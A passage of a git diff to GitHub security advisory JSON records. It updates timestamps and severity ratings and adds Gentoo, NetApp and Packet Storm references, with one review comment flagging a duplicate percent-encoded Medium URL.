+++ b/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w5h6-8xc7-vp2c",
- "modified": "2023-09-22T03:30:50Z",
+ "modified": "2024-02-02T15:30:28Z",
 "published": "2023-09-21T00:31:16Z",
 "aliases": [
 "CVE-2023-36234"
@@ -30,7 +30,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-20T22:15:12Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json b/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json
index 116322334b66e..44396000cb241 100644
--- a/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json
+++ b/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json
@@ -49,6 +49,10 @@
 "type": "WEB",
 "url": "https://security.gentoo.org/glsa/202312-07"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5491"
diff --git a/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json b/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json
index 4c8a0c7389e2a..c498502ff8150 100644
--- a/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json
+++ b/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-whx3-c4j7-hh43",
- "modified": "2023-09-15T15:30:14Z",
+ "modified": "2024-01-31T18:31:20Z",
 "published": "2023-09-12T21:30:17Z",
 "aliases": [
 "CVE-2023-4908"
@@ -41,6 +41,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2023/dsa-5499"
@@ -50,7 +54,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2023-09-12T21:15:09Z"
diff --git a/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json b/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json
index edf7d54d521d0..10b46785ee54f 100644
--- a/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json
+++ b/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xq9m-9whg-jv3m",
- "modified": "2023-09-28T18:30:44Z",
+ "modified": "2024-01-31T15:30:18Z",
 "published": "2023-09-27T15:30:36Z",
 "aliases": [
 "CVE-2023-41074"
@@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EEMDC5TQAANFH5D77QM34ZTUKXPFGVL/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213936" @@ -78,7 +82,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T15:19:26Z" diff --git a/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json b/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json index 3ce18a415216d..44f138718ad0b 100644 --- a/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json +++ b/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json @@ -61,6 +61,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-October/003430.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231130-0004/" diff --git a/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json b/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json index 76df28c930d46..901f6730d9915 100644 --- a/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json +++ b/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3r5f-38cp-r8x3", - "modified": "2023-10-11T18:30:27Z", + "modified": "2024-02-05T18:31:36Z", "published": "2023-10-04T12:30:14Z", "aliases": [ "CVE-2023-43261" 
@@ -25,6 +25,10 @@
"type": "WEB",
"url": "https://github.com/win3zz/CVE-2023-43261"
},
+ {
+ "type": "WEB",
+ "url": "https://medium.com/%40win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf"
+ },
{
"type": "WEB",
"url": "https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf"
@@ -37,6 +41,10 @@
"type": "WEB",
"url": "http://milesight.com"
},
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176988/Milesight-UR5X-UR32L-UR32-UR35-UR41-Credential-Leakage.html"
+ },
{
"type": "WEB",
"url": "http://ur5x.com"
@@ -46,7 +54,7 @@
"cwe_ids": [
"CWE-532"
],
- "severity": null,
+ "severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-10-04T12:15:10Z"
diff --git a/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json b/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json
index 4c0ab28afb6b6..fcd188649a6ab 100644
--- a/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json
+++ b/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json
@@ -40,6 +40,10 @@
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RA6HMWNOYQ56R35MHW77GVW7373Z4RSN/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202401-34"
}
],
"database_specific": {
diff --git a/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json b/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json
index 92805716e2d5f..b5365f2ce3c9c 100644
--- a/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json
+++ b/advisories/unreviewed/2023/10/GHSA-5fgm-x6g8-c36j/GHSA-5fgm-x6g8-c36j.json
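Review bot: The reference added in the first hunk, `https://medium.com/%40win3zz/inside-the-router-...`, points at the same write-up as the existing `https://medium.com/@win3zz/inside-the-router-...` entry two lines below it, differing only in whether the `@` is percent-encoded, so the advisory now lists that source twice. Consumers that de-duplicate or key references by exact URL string will surface both entries, and the percent-encoded spelling is the one any URL normalizer would fold away. Presumably this arrived through the automated NVD reference sync rather than by hand, so the durable fix is in the importer — decode safe percent-escapes such as `%40` before comparing a candidate against the existing `references` list — and the immediate fix here is to drop the new `%40` entry and keep the literal-`@` form. The Packet Storm reference in the second hunk and the `"severity": "HIGH"` change in the third are consistent with the existing CWE-532 credential-leakage classification and need no change.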
@@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json b/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json index 44d613ca79a35..41be70673c3e3 100644 --- a/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json +++ b/advisories/unreviewed/2023/10/GHSA-63pw-wc3v-c9g9/GHSA-63pw-wc3v-c9g9.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json b/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json index 0a7ed62e52d37..35df62d7458da 100644 --- a/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json +++ b/advisories/unreviewed/2023/10/GHSA-7245-jcxv-7q52/GHSA-7245-jcxv-7q52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-7245-jcxv-7q52", - "modified": "2023-10-06T18:30:32Z", + "modified": "2024-01-31T15:30:18Z", "published": "2023-10-06T18:30:32Z", "aliases": [ "CVE-2023-39928" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EEMDC5TQAANFH5D77QM34ZTUKXPFGVL/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1831" @@ -42,7 +46,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-06T16:15:13Z" 
diff --git a/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json b/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json index 0eadba697e194..048e669f931c2 100644 --- a/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json +++ b/advisories/unreviewed/2023/10/GHSA-74q5-gg24-8jcf/GHSA-74q5-gg24-8jcf.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json b/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json index 211059ca7b237..9e08ac4b62aae 100644 --- a/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json +++ b/advisories/unreviewed/2023/10/GHSA-7xw9-w465-6x42/GHSA-7xw9-w465-6x42.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231027-0009/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0005/" + }, { "type": "WEB", "url": "https://support.apple.com/kb/HT214036" diff --git a/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json b/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json index da2f0857872a4..29db411563a50 100644 --- a/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json +++ b/advisories/unreviewed/2023/10/GHSA-962v-m5vf-4cv6/GHSA-962v-m5vf-4cv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-962v-m5vf-4cv6", - "modified": "2023-10-25T18:32:22Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-10-25T18:32:22Z", "aliases": [ "CVE-2023-39219" 
@@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-400" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-25T18:17:28Z" diff --git a/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json b/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json index f72480a7335b2..dc43e5c53d34e 100644 --- a/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json +++ b/advisories/unreviewed/2023/10/GHSA-9855-248g-3cv8/GHSA-9855-248g-3cv8.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json b/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json index 03e6415e0ef16..35a4eb4e453eb 100644 --- a/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json +++ b/advisories/unreviewed/2023/10/GHSA-9pf8-85g4-h267/GHSA-9pf8-85g4-h267.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json b/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json index c5f0067799673..cd9641293cb50 100644 --- a/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json +++ b/advisories/unreviewed/2023/10/GHSA-ch24-2427-xcwg/GHSA-ch24-2427-xcwg.json 
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json b/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json index 2971184a25c69..fd7492e95d737 100644 --- a/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json +++ b/advisories/unreviewed/2023/10/GHSA-ch8m-5863-fcr7/GHSA-ch8m-5863-fcr7.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTCZGQPRDAOPP6NK4CIDJKIPMBWD5J7K/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213981" diff --git a/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json b/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json index 33c7a405772e4..36db532321d3d 100644 --- a/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json +++ b/advisories/unreviewed/2023/10/GHSA-cvp3-7vpw-ffh6/GHSA-cvp3-7vpw-ffh6.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json b/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json index e61ea0fcc6e89..b3da93a74e68e 100644 --- a/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json +++ b/advisories/unreviewed/2023/10/GHSA-f483-q24h-3j43/GHSA-f483-q24h-3j43.json 
@@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json b/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json index 06998b280e858..f93a62211b51f 100644 --- a/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json +++ b/advisories/unreviewed/2023/10/GHSA-fjv7-prxm-hm8g/GHSA-fjv7-prxm-hm8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fjv7-prxm-hm8g", - "modified": "2023-10-16T18:30:27Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-11T12:30:27Z", "aliases": [ "CVE-2023-44109" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-74" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-11T11:15:14Z" diff --git a/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json b/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json index afe42f1f11c63..5684a9e3bf721 100644 --- a/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json +++ b/advisories/unreviewed/2023/10/GHSA-g488-m495-9mgj/GHSA-g488-m495-9mgj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g488-m495-9mgj", - "modified": "2023-10-03T03:31:24Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-10-03T03:31:24Z", "aliases": [ "CVE-2023-5345" 
@@ -40,13 +40,17 @@ { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5PDNWPKAP3WL5RQZ4RIDS6MG32OHH5R/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "database_specific": { "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-03T03:15:09Z" diff --git a/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json b/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json index 283f6119acbb8..32234f6161194 100644 --- a/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json +++ b/advisories/unreviewed/2023/10/GHSA-ggqw-5347-f844/GHSA-ggqw-5347-f844.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json b/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json index 5e82a3cf1b4cd..74856c836a149 100644 --- a/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json +++ b/advisories/unreviewed/2023/10/GHSA-hvph-2g5j-p2c9/GHSA-hvph-2g5j-p2c9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hvph-2g5j-p2c9", - "modified": "2023-10-10T06:30:30Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-10T06:30:29Z", "aliases": [ "CVE-2023-5467" @@ -38,7 +38,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-10T05:15:09Z" 
diff --git a/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json b/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json index 6f530930b2c22..4a14d9e967c5a 100644 --- a/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json +++ b/advisories/unreviewed/2023/10/GHSA-j6jf-4ffc-g9xf/GHSA-j6jf-4ffc-g9xf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6jf-4ffc-g9xf", - "modified": "2023-10-31T15:30:20Z", + "modified": "2024-02-05T18:31:36Z", "published": "2023-10-25T18:32:21Z", "aliases": [ "CVE-2023-36085" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176991/SISQUAL-WFM-7.1.319.103-Host-Header-Injection.html" } ], "database_specific": { "cwe_ids": [ "CWE-601" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-25T18:17:28Z" diff --git a/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json b/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json index 0cc40986fafe3..83e8228ceca06 100644 --- a/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json +++ b/advisories/unreviewed/2023/10/GHSA-j7xf-pgw2-75mr/GHSA-j7xf-pgw2-75mr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j7xf-pgw2-75mr", - "modified": "2023-10-04T18:30:32Z", + "modified": "2024-02-04T12:30:28Z", "published": "2023-10-04T18:30:32Z", "aliases": [ "CVE-2023-5371" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://gitlab.com/wireshark/wireshark/-/issues/19322" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-09" + }, { "type": "WEB", "url": "https://www.wireshark.org/security/wnpa-sec-2023-27.html" 
@@ -35,7 +39,7 @@ "CWE-770", "CWE-789" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-04T17:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json b/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json index 41349821e4e8c..683cdf9f3f5ac 100644 --- a/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json +++ b/advisories/unreviewed/2023/10/GHSA-jj6p-fg3r-6vr7/GHSA-jj6p-fg3r-6vr7.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json b/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json index 8c08479dcfcb0..286762e6a526e 100644 --- a/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json +++ b/advisories/unreviewed/2023/10/GHSA-jmh8-4h3g-x5g5/GHSA-jmh8-4h3g-x5g5.json @@ -33,6 +33,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTCZGQPRDAOPP6NK4CIDJKIPMBWD5J7K/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213981" diff --git a/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json b/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json index b6b175286e3d7..05afd79688baf 100644 --- a/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json +++ b/advisories/unreviewed/2023/10/GHSA-jr8w-j9v9-c93x/GHSA-jr8w-j9v9-c93x.json 
@@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json b/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json index 444baa3d2df01..8b1df42134e96 100644 --- a/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json +++ b/advisories/unreviewed/2023/10/GHSA-jrmp-538j-7h55/GHSA-jrmp-538j-7h55.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5526" diff --git a/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json b/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json index 305303e719f11..67667ef5daaa2 100644 --- a/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json +++ b/advisories/unreviewed/2023/10/GHSA-jvxf-w5f4-25gh/GHSA-jvxf-w5f4-25gh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jvxf-w5f4-25gh", - "modified": "2023-10-18T00:31:41Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-10-18T00:31:41Z", "aliases": [ "CVE-2023-22074" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2023.html" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/175352/Oracle-19c-21c-Sharding-Component-Password-Hash-Exposure.html" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-17T22:15:13Z" 
diff --git a/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json b/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json index 5715bc994fa05..52389eace8e2c 100644 --- a/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json +++ b/advisories/unreviewed/2023/10/GHSA-m58q-xcxc-4q6h/GHSA-m58q-xcxc-4q6h.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32359" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213981" diff --git a/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json b/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json index 8f4d495356723..ca581dd815b70 100644 --- a/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json +++ b/advisories/unreviewed/2023/10/GHSA-phrf-fj83-fcfv/GHSA-phrf-fj83-fcfv.json @@ -21,6 